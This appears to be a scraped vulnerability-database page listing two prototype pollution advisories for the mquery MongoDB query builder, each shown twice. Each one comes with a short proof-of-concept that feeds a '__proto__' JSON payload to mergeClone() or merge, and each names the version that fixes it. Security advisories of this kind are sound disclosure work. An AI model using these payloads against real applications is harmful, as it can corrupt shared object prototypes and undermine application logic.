Vulnerability	Vulnerable Version
H Prototype Pollution mquery is an Expressive query building for MongoDB Affected versions of this package are vulnerable to Prototype Pollution via the `mergeClone()` function. PoC by zhou, peng `mquery = require('mquery'); var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}'; console.log('Before:', {}.polluted); // undefined mquery.utils.mergeClone({}, JSON.parse(malicious_payload)); console.log('After:', {}.polluted); // HACKED` How to fix Prototype Pollution? Upgrade `mquery` to version 3.2.5 or higher.	<3.2.5
H Prototype Pollution mquery is an Expressive query building for MongoDB Affected versions of this package are vulnerable to Prototype Pollution via the `merge` function within `lib/utils.js`. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program. PoC `require('./env').getCollection(function(err, collection) { assert.ifError(err); col = collection; done(); }); var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable"}}'); var m = mquery(payload); console.log({}.polluted); // The empty object {} will have a property called polluted which will print vulnerable` How to fix Prototype Pollution? Upgrade `mquery` to version 3.2.3 or higher.	<3.2.3

Prototype Pollution

mquery is an Expressive query building for MongoDB

Affected versions of this package are vulnerable to Prototype Pollution via the mergeClone() function.

PoC by zhou, peng

mquery = require('mquery');
var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}';
console.log('Before:', {}.polluted); // undefined
mquery.utils.mergeClone({}, JSON.parse(malicious_payload));
console.log('After:', {}.polluted); // HACKED

How to fix Prototype Pollution?

Upgrade mquery to version 3.2.5 or higher.

<3.2.5

Prototype Pollution

mquery is an Expressive query building for MongoDB

Affected versions of this package are vulnerable to Prototype Pollution via the merge function within lib/utils.js. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

PoC

   require('./env').getCollection(function(err, collection) {
      assert.ifError(err);
      col = collection;
      done();
    });
    var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable"}}');
    var m = mquery(payload);
    console.log({}.polluted);
// The empty object {} will have a property called polluted which will print vulnerable

How to fix Prototype Pollution?

Upgrade mquery to version 3.2.3 or higher.

<3.2.3

Go back to all versions of this package